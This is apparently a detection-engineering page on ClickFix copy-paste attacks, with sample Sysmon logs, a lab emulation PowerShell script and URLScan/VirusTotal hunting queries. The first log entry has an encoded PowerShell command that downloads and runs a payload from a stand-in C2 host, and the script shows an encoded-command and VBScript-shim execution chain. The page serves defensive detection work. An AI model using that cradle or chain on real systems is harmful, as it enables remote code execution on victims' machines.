CommandLine: powershell.exe -NonInteractive -NoProfile -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjADIALQBkAG8AbQBhAGkAbgAvAHAAYQB5AGwAbwBhAGQAJwApAA==
CurrentDirectory: C:\Users\jsmith\
ParentProcessId: 6892
ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe
ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer
# Key signal: ParentImage=chrome.exe + CommandLine contains -EncodedCommand
# User copied "fix" command from malicious page, pasted into Run dialog
EID 22 Sysmon DNS query from PowerShell to attacker C2 domain during resolution phase ▶
EventID: 22 (DNS query)
UtcTime: 2024-11-03 14:52:18.031
ProcessGuid: {b2c3d4e5-2345-6789-bcde-f01234567890}
ProcessId: 7124
QueryName: update-cdn77.net
QueryStatus: 0
QueryResults: type: 5 cdn-update-service.net;::ffff:185.220.101.47;
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
# Non-browser process making DNS query for a newly registered domain
EID 3 Sysmon Outbound network connection from PowerShell to C2 for payload download or beacon ▶
EventID: 3 (NetworkConnect)
UtcTime: 2024-11-03 14:52:18.247
ProcessGuid: {b2c3d4e5-2345-6789-bcde-f01234567890}
ProcessId: 7124
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: CORP\jsmith
Protocol: tcp
Initiated: true
SourceIp: 10.10.1.87
SourcePort: 54221
DestinationIp: 185.220.101.47
DestinationHostname: update-cdn77.net
DestinationPort: 443
# powershell.exe connecting to non-RFC1918 IP within seconds of parent=chrome.exe launch
Emulation
ATT&CK: T1204.004 Simulates ClickFix interpreter execution with encoded command and outbound connection powershell ▶
⚠
Lab use only. Run in isolated lab VM only. Makes a benign outbound HTTP request to example.com.
#Requires -Version 5.1
# MITRE ATT&CK: T1204.004 — Malicious Copy-Paste
# Simulates ClickFix UI deception chain that spawns a script interpreter to execute a payload.
[CmdletBinding()]
param(
[switch]$UseVbsShim,
[switch]$CleanupOnly
)
Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'
$VbsShimPath = Join-Path $env:TEMP "cf_shim_$(Get-Random).vbs"
$C2Endpoint = 'https://example.com'
function Write-Step ([string]$Msg) { Write-Host "[*] $Msg" -ForegroundColor Cyan }
function Write-Ok ([string]$Msg) { Write-Host "[+] $Msg" -ForegroundColor Green }
function Write-Warn ([string]$Msg) { Write-Host "[!] $Msg" -ForegroundColor Yellow }
function Remove-Artefacts {
if (Test-Path $VbsShimPath) {
Remove-Item $VbsShimPath -Force -ErrorAction SilentlyContinue
Write-Ok "Removed VBS shim: $VbsShimPath"
}
}
if ($CleanupOnly) { Remove-Artefacts; exit 0 }
Write-Host ""
Write-Host "=== ClickFix Technique Emulation ===" -ForegroundColor Magenta
Write-Host " T1204.004 | Detection Chokepoints Project" -ForegroundColor DarkGray
Write-Host ""
Write-Step "Step 1/3 — Executing PowerShell with -EncodedCommand flag"
# Benign payload: Get-Date | Out-String (base64 encoded)
$BenignCmd = 'Get-Date | Out-String'
$EncodedCmd = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($BenignCmd))
Write-Verbose " Encoded payload (benign): $EncodedCmd"
$result = powershell.exe -NonInteractive -NoProfile -EncodedCommand $EncodedCmd
Write-Ok "Encoded command executed. Output: $($result.Trim())"
Start-Sleep -Milliseconds 300
Write-Step "Step 2/3 — DNS resolution + outbound HTTP connection from interpreter"
try {
$null = [System.Net.Dns]::GetHostAddresses('example.com')
Write-Ok "DNS resolved example.com (Sysmon EID 22 generated)"
} catch {
Write-Warn "DNS resolution failed: $_"
}
try {
$resp = Invoke-WebRequest -Uri $C2Endpoint -Method HEAD -TimeoutSec 10 `
-UseBasicParsing -ErrorAction Stop
Write-Ok "Outbound connection made (HTTP $($resp.StatusCode)) — Sysmon EID 3 generated"
} catch {
Write-Warn "Network request failed (telemetry may still fire): $_"
}
Start-Sleep -Milliseconds 300
# This is what makes Hunt/Analyst rules fire — browser/scripting parent spawning PowerShell
if ($UseVbsShim) {
Write-Step "Step 3/3 — Spawning PowerShell via VBScript shim (browser parent simulation)"
Write-Verbose " Note: For full browser parent (chrome.exe → powershell.exe), manually:"
Write-Verbose " 1. Open Chrome, press F12 → Console"
Write-Verbose " 2. This script cannot automate that chain safely"
# VBScript spawns PowerShell with encoded command — simulates wscript.exe parent chain
$InnerEncoded = [Convert]::ToBase64String(
[System.Text.Encoding]::Unicode.GetBytes('Write-Host "ClickFix emulation - child of wscript"')
)
$VbsContent = @"
Dim oShell
Set oShell = CreateObject("WScript.Shell")
oShell.Run "powershell.exe -NonInteractive -NoProfile -EncodedCommand $InnerEncoded", 0, True
"@
Set-Content -Path $VbsShimPath -Value $VbsContent -Encoding ASCII
Write-Ok "VBS shim written to $VbsShimPath"
try {
$proc = Start-Process -FilePath 'wscript.exe' -ArgumentList "`"$VbsShimPath`"" `
-Wait -PassThru -ErrorAction Stop
Write-Ok "VBScript → PowerShell chain executed (wscript.exe PID $($proc.Id))"
Write-Ok "Expected parent chain in telemetry: wscript.exe → powershell.exe"
} catch {
Write-Warn "VBS shim execution failed: $_"
}
} else {
Write-Warn "Step 3 skipped (run with -UseVbsShim for Hunt/Analyst parent chain simulation)"
Write-Warn "For full Analyst rule validation, Hunt parent chain requires browser context."
Write-Host ""
Write-Host " Manual Hunt/Analyst test:" -ForegroundColor DarkGray
Write-Host " 1. Open Chrome/Edge DevTools console" -ForegroundColor DarkGray
Write-Host " 2. Paste: powershell.exe -enc $EncodedCmd" -ForegroundColor DarkGray
Write-Host " 3. Check Sysmon EID 1 for ParentImage=chrome.exe" -ForegroundColor DarkGray
}
Write-Host ""
Write-Step "Cleaning up artefacts"
Remove-Artefacts
Write-Host ""
Write-Host "=== Emulation Complete ===" -ForegroundColor Magenta
Write-Host ""
Write-Host "Expected detections:" -ForegroundColor White
Write-Host " [Research] Sysmon EID 1 (powershell w/ -enc) + EID 3 (outbound network)" -ForegroundColor DarkCyan
Write-Host " [Hunt] EID 1 parent=wscript/browser + EID 3 within 60s" -ForegroundColor DarkYellow
Write-Host " [Analyst] EID 1 (-enc, browser parent) + EID 3 (external) + EID 22 (DNS)" -ForegroundColor DarkGreen
Write-Host ""
Write-Host "If no alerts fired, verify:" -ForegroundColor DarkGray
Write-Host " - Sysmon config captures EID 1 (all process creation) and EID 3 (network)"
Write-Host " - Process creation command-line logging enabled in Sysmon config"
Write-Host " - DNS logging enabled (EID 22) in Sysmon config"
Write-Host ""
OSINT Pivots
URLScan
page.body:navigator.clipboard.writeText AND page.body:"Verify"
Clipboard writeText API co-occurring with "Verify" text. Catches CAPTCHA-themed ClickFix lures across Cloudflare and reCAPTCHA impersonation variants.
URLScan
page.body:"I am not a robot" AND page.body:navigator.clipboard
Fake CAPTCHA pages that write to the clipboard. The canonical ClickFix lure. High precision across reCAPTCHA and Cloudflare impersonation variants.
URLScan
page.body:navigator.clipboard AND page.body:"Win+R"
Pages with clipboard API AND Run dialog instruction. The execution step unique to ClickFix. Swap "Win+R" for "PowerShell" or "Terminal" to find TerminalFix variants.
VirusTotal Intelligence
behavior_processes:"nslookup.exe" tag:powershell
Requires VT Intelligence subscription; targets DNS-based ClickFix staging where nslookup retrieves the payload instead of direct HTTP download.
VirusTotal Intelligence
behavior_processes:"powershell.exe" behavior_command_line:"-enc" tag:dropper
Requires VT Intelligence subscription; finds encoded PowerShell droppers consistent with ClickFix payload obfuscation patterns.